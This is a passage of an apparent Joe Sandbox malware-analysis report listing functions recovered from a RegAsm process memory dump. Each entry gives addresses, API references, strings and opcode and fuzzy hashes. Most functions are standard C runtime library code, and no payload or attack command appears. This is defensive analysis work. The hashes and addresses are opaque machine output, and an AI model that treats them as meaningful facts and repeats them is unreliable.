Opcode Fuzzy Hash: 91f082824127807ca67e9bea16e4e1142dcaa675fdc02378074aa91e014118a9
Instruction Fuzzy Hash:

Function 0041EFD8 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0041EFD8

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction ID: d5d072ba9748c195f736b78e16f2f5f2af1f06de213b616d404cea10f9c51eb0
Opcode Fuzzy Hash: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction Fuzzy Hash: 01A02230300280CF83808F32AE0CB0C3FF8AE082E0B0AC03AA000C80B0EF3080A0AF08

Function 0041914C Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa0ba1e5d9a22f7c6db1b863d068fd7604d8ca8b2c2046f773a74d09f23aaf89
Instruction ID: ed00e364353b2709b8c4936f7de79ec0fff9d1aa87bc6e08b7c0caa285f9e44e
Opcode Fuzzy Hash: fa0ba1e5d9a22f7c6db1b863d068fd7604d8ca8b2c2046f773a74d09f23aaf89
Instruction Fuzzy Hash: 73E04632911268EBCB18DB89C95898AB2ACEB44B04B15009AF902D3210C274DE80C7D4

Function 004114A6 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eafc9afbd71d0c63c25bd700d152b00fba6a1b79f89aedc9458559ba3c3e83a7
Instruction ID: 9d670eee6a7ff43784672fcc557034ad53df9d6dcb31fc26035e34de67efaf71
Opcode Fuzzy Hash: eafc9afbd71d0c63c25bd700d152b00fba6a1b79f89aedc9458559ba3c3e83a7
Instruction Fuzzy Hash: 6EC08C3420098046CF29CE10C2713EA33D5A392B82F80098ECA0A0F752CA1E9CC2DA44

Function 00404B20 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404B4C
std::_Lockit::_Lockit.LIBCPMT ref: 00404B69
std::_Lockit::~_Lockit.LIBCPMT ref: 00404B8D
std::_Lockit::~_Lockit.LIBCPMT ref: 00404BB8
std::_Lockit::_Lockit.LIBCPMT ref: 00404C2A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00404C7F
__Getctype.LIBCPMT ref: 00404C96
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404CD6
std::_Lockit::~_Lockit.LIBCPMT ref: 00404D78
std::_Facet_Register.LIBCPMT ref: 00404D7E

Strings

bad locale name, xrefs: 00404D98

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 103145292-1405518554
Opcode ID: c0c875cd123add666a1ba57ec1f0c94ac2efaa9798bd961d6f12d2679ec0601c
Instruction ID: c45789c66640c356b2bc41b45c406846e681c44b1f4b151baf81fb86c109fe15
Opcode Fuzzy Hash: c0c875cd123add666a1ba57ec1f0c94ac2efaa9798bd961d6f12d2679ec0601c
Instruction Fuzzy Hash: 7B619FB19043408BD720DF65D941B5BB7F4AFD4304F05493EE989A7392E738E948CB5A

Function 0040A998 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0040AAB7
___TypeMatch.LIBVCRUNTIME ref: 0040ABC5
_UnwindNestedFrames.LIBCMT ref: 0040AD17
CallUnexpected.LIBVCRUNTIME ref: 0040AD32

Strings

csm, xrefs: 0040AA42
hqB, xrefs: 0040AAAE
csm, xrefs: 0040A9D5
csm, xrefs: 0040AAEE

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$hqB
API String ID: 2751267872-961717235
Opcode ID: e36ee884f164e9add2727880ca9071425b34f9d54382f0fd290b92e68b7c122e
Instruction ID: 1a84720c735a061b690d6f447b3278b908e1dcb1436106e9bb87ee9a1a6810cd
Opcode Fuzzy Hash: e36ee884f164e9add2727880ca9071425b34f9d54382f0fd290b92e68b7c122e
Instruction Fuzzy Hash: 2DB18A718003099FDF14DFA5C9809AEBBB5FF14304B19456BE8017B282C739DA61CF9A

Function 00422D42 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042485F), ref: 00422D5B

Strings

exp, xrefs: 00422DDA, 00422E3F
pow, xrefs: 00422DF9, 00422EA3, 00422EF0
sqrt, xrefs: 00422E9A
acos, xrefs: 00422E91
asin, xrefs: 00422E88
log, xrefs: 00422DB8, 00422DC7
log10, xrefs: 00422D9D, 00422DAC

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
Instruction ID: 541d14d2076966b173cd57405107be29c5c83d47e8039af315078564b0fddfcc
Opcode Fuzzy Hash: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
Instruction Fuzzy Hash: 76514371B0062AEBCB108F59FA4C1AEBBB0FB45304F924057D480A6354CBBD8925EB5E

Function 00405A29 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405A30
std::_Lockit::_Lockit.LIBCPMT ref: 00405A3A

Part of subcall function 00401980: std::_Lockit::_Lockit.LIBCPMT ref: 0040199C
Part of subcall function 00401980: std::_Lockit::~_Lockit.LIBCPMT ref: 004019B9

codecvt.LIBCPMT ref: 00405A74
std::_Facet_Register.LIBCPMT ref: 00405A8B
std::_Lockit::~_Lockit.LIBCPMT ref: 00405AAB
__EH_prolog3.LIBCMT ref: 00405AC5

Strings

A]@, xrefs: 00405AEB
pdB, xrefs: 00405B01

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Facet_Registercodecvt
String ID: A]@$pdB
API String ID: 2149013928-1964063989
Opcode ID: 48a836b95ea0a2a7942309d70e795f41733f6e8201952988750b77b38025a74f
Instruction ID: 869559141b16ddd60639a7327273d1e33329aff20660fcaf6a9c65af963ad09c
Opcode Fuzzy Hash: 48a836b95ea0a2a7942309d70e795f41733f6e8201952988750b77b38025a74f
Instruction Fuzzy Hash: E5318174A00615CFCB11EF68C480AAEBBF0FF48354F54452EE445AB392DB79AA00CF99

Function 0040718A Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407190
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0040719E
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004071AF
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004071C0

Strings

GetTempPath2W, xrefs: 004071B5
GetCurrentPackageId, xrefs: 00407198
GetSystemTimePreciseAsFileTime, xrefs: 004071A4
kernel32.dll, xrefs: 0040718B

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction ID: 3afd18a413fbafaec0d1884410ec314f69904bb85606d66d63126fe90f125993
Opcode Fuzzy Hash: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction Fuzzy Hash: 3CE0EC71749671AB83209F70BC0EDAA3AA4EE0971139205B2BD15D2361D6BC44559B9C

Function 00424323 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(010CDA30,010CDA30,?,7FFFFFFF,?,004245F3,010CDA30,010CDA30,?,010CDA30,?,?,?,?,010CDA30,?), ref: 004243C9
__alloca_probe_16.LIBCMT ref: 00424484
__alloca_probe_16.LIBCMT ref: 00424513
__freea.LIBCMT ref: 0042455E
__freea.LIBCMT ref: 00424564
__freea.LIBCMT ref: 0042459A
__freea.LIBCMT ref: 004245A0
__freea.LIBCMT ref: 004245B0

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 8a56644c9f658ced4a7fecf9f58cf2b799a0c4498a4b3962048a55bd8390d3ba
Instruction ID: b3b1fd3be87dc675253da9249cad55eb0a70a834b65d1a532299ad71412a1fff
Opcode Fuzzy Hash: 8a56644c9f658ced4a7fecf9f58cf2b799a0c4498a4b3962048a55bd8390d3ba
Instruction Fuzzy Hash: 24711872B00625ABDF20AE64AC41BAF77B5DFC5314F94005BEA44A7381D73CDC8187A9

Function 00414301 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,82DB3677,?,0041440E,004038E3,?,?,00000000), ref: 004143C2

Strings

api-ms-, xrefs: 00414358
ext-ms-, xrefs: 0041436C

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction ID: 9d281342414512710d521e2bc5e8bd8d189b06f0c9bb1d1e4d3acc3ca9f27be4
Opcode Fuzzy Hash: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction Fuzzy Hash: 9E21F371B41219ABCB219B61AC41F9B77589F817B4F250222ED26A73C0D738ED42C6D8

Function 00422232 Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
Instruction ID: 9d2747a7e5b70225cc448f1b3832819408a251e63c6cb1e4317f51345b07cf5e
Opcode Fuzzy Hash: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
Instruction Fuzzy Hash: B9B1E870B00215BFDB11DF59D980BAE7BB1BF45304F94816AE401AB392C7B99D42CB69

Function 0040A62A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040A621,00408D5A,00407CB3), ref: 0040A638
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040A646
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040A65F
SetLastError.KERNEL32(00000000,0040A621,00408D5A,00407CB3), ref: 0040A6B1

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: f63bbb8cb7aec36dee6161e5b527cb909134a011cd361eeab7ab36a7405b742e
Instruction ID: 78011c5e5d228000ed262031febe4d72c2c7c60d5ad4d387ad9a5ce747099190
Opcode Fuzzy Hash: f63bbb8cb7aec36dee6161e5b527cb909134a011cd361eeab7ab36a7405b742e
Instruction Fuzzy Hash: 530128332093112ED62427B6BD45A5B2678DB51774738063FF510722F1EF7E5C11554D

Function 004114C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,82DB3677,?,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 004114FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041150F
FreeLibrary.KERNEL32(00000000,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 00411531

Strings

mscoree.dll, xrefs: 004114F6
CorExitProcess, xrefs: 00411507

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
Instruction ID: 91ec29eb5be505712193f20e889ba6035279a869843729da5c2c1c8d1a6e38dc
Opcode Fuzzy Hash: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
Instruction Fuzzy Hash: 5E018431A50625EBDB218F50DC09BAEB7F9FB44B11F400526F912A22A0DB789900CA58

Function 00418EB1 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00418F38
__alloca_probe_16.LIBCMT ref: 00418FF9
__freea.LIBCMT ref: 00419060

Part of subcall function 00415426: HeapAlloc.KERNEL32(00000000,?,?,?,00407448,?,?,004038E3,0000000C), ref: 00415458

__freea.LIBCMT ref: 00419075
__freea.LIBCMT ref: 00419085

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: b34ec7378ed80fdedf5b3cd9fd74b686b7ca20f323847e8b562edae9002d46d2
Instruction ID: 5a58541e407446bb28ced3c61191459bbd43b91e1c19ac61a4b7f941500e9d67
Opcode Fuzzy Hash: b34ec7378ed80fdedf5b3cd9fd74b686b7ca20f323847e8b562edae9002d46d2
Instruction Fuzzy Hash: 1451E572600206AFDB249E65CC81EFB3AA9EF48754B15012EFD05D7250EB39DD81C7A9

Function 00401F00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408090: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407FAB,?,?,?,?,00407FAB,0000000C,00432FA4,0000000C), ref: 004080F0

Strings

ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80
ios_base::failbit set, xrefs: 00401E62, 00401F41
ios_base::eofbit set, xrefs: 00401F46

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 4ead06d7015465d74104fe04bb50a28eb9893de3519d089dfdf398cb4e8224d9
Instruction ID: 39c8128b798e2086e3302e8ab46e2dce8cada1f1b911e2d41b88b79c7a5bec65
Opcode Fuzzy Hash: 4ead06d7015465d74104fe04bb50a28eb9893de3519d089dfdf398cb4e8224d9
Instruction Fuzzy Hash: BD1136B29107156BC710DF68D801B86B3E8AF08310F14853FFA54E7291F778E804CBA9

Function 00407420 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407DA8
___raise_securityfailure.LIBCMT ref: 00407E90

Strings

#7@, xrefs: 00407E13
@SC, xrefs: 00407E8B

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: #7@$@SC
API String ID: 3761405300-54278199
Opcode ID: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
Instruction ID: 0d92a2c854cdd6e88b4d1eeb56e5bf4da0bfe8ec24aca00867b110679a0b03e4
Opcode Fuzzy Hash: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
Instruction Fuzzy Hash: DA2107B4640A00DBD318CF15F9857943BF4BB68355FA0643AE9088B3B1D3B46485CF1E

Function 0040B772 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx), ref: 0040B77F
GetLastError.KERNEL32(?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx,00000000,?,0040B67D), ref: 0040B789
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0040A593), ref: 0040B7B1

Strings

api-ms-, xrefs: 0040B796

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction ID: 4a96934300341e5ece3864587fe3feae18b3ac400cb1fe2ce3454729e361f76d
Opcode Fuzzy Hash: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction Fuzzy Hash: 29E01A30384208BBEF205B61EC06F5A3E64EB40B85F904031FB0DE91E1E775A9519ACC

Function 004164C2 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(82DB3677,00000000,00000000,0040BDB8), ref: 00416525

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00416780
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004167C8
GetLastError.KERNEL32 ref: 0041686B

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
Instruction ID: 1bb8143dd65314e62236f50c93da9e0a6d801424c5e2e01ca8c3ea5794d6433d
Opcode Fuzzy Hash: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
Instruction Fuzzy Hash: 7DD158B5E002589FCB11DFA9D880AEDBBB5FF48304F19412AE856E7351D734E882CB58

Function 0040A741 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0040A808
___AdjustPointer.LIBCMT ref: 0040A82B
___AdjustPointer.LIBCMT ref: 0040A8C7

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction ID: 639cff4bd66d4eed68713a8ae307c2d2d1180f9e9004782a502f2a6fa8fea26a
Opcode Fuzzy Hash: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction Fuzzy Hash: 3D51CF72A00302AFEB29AF52C941B7A73A4EF40304F14853FE805672D1D739EC62C79A

Function 0041B4A7 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

GetLastError.KERNEL32 ref: 0041B50B
__dosmaperr.LIBCMT ref: 0041B512
GetLastError.KERNEL32(?,?,?,?), ref: 0041B54C
__dosmaperr.LIBCMT ref: 0041B553

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction ID: cec987ca27f54d0df3a57789ab5f391b1316bc0051da666ab1eca3c5aeea150a
Opcode Fuzzy Hash: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction Fuzzy Hash: 3221B671600215BFDB20EF66C8418ABB7ADFF043A8710852FF85997251D779ED9087D4

Function 004108A2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction ID: f8db4804455f599fb5fabd8b5f86bcd1d132503182311fbe19c9dedc91394c0d
Opcode Fuzzy Hash: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction Fuzzy Hash: 8F21F9B1610205AFEB20AF62CC90DAB776CFF40368710452BF415D7252D7B9EDD097A8

Function 0041C43D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041C445

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C47D
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C49D

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction ID: cd346ceb72f841712861b774b6322b7d2f9c84398f992d5f92ec2fcb375f728e
Opcode Fuzzy Hash: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction Fuzzy Hash: 091104B2A48515BF672127B25CDACFF6D5CDE99398310402AF802D2102EE2CDD8285BD

Function 004241E7 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000), ref: 004241FE
GetLastError.KERNEL32(?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8,0040BDB8,?,00416E7D,?), ref: 0042420A

Part of subcall function 004241D0: CloseHandle.KERNEL32(FFFFFFFE,0042421A,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8,0040BDB8), ref: 004241E0

___initconout.LIBCMT ref: 0042421A

Part of subcall function 00424192: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004241C1,00421C31,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8), ref: 004241A5

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8), ref: 0042422F

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction ID: 4f4531f6176a0c5b6c9a7a905856594723a902087f3f8d784f297790ae8fc46e
Opcode Fuzzy Hash: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction Fuzzy Hash: C1F03736200124BBCF222FD5FC0899A7F26FB853B0F414065FA5995130C6319870AB99

Function 00401E50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408090: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407FAB,?,?,?,?,00407FAB,0000000C,00432FA4,0000000C), ref: 004080F0

Strings

ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80
ios_base::failbit set, xrefs: 00401E62

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 195284d85085cfcb6c91532f94d9606232df54a46d20a557ea02a48c59055347
Instruction ID: 797d091bbb829d4e8b0eea89e00af225cce609620468ab5527f299f1bcc47ce9
Opcode Fuzzy Hash: 195284d85085cfcb6c91532f94d9606232df54a46d20a557ea02a48c59055347
Instruction Fuzzy Hash: 2D414771504301AFC304DF29C841A9BB7E8EF89310F14862FF994A76A1E778E945CB99

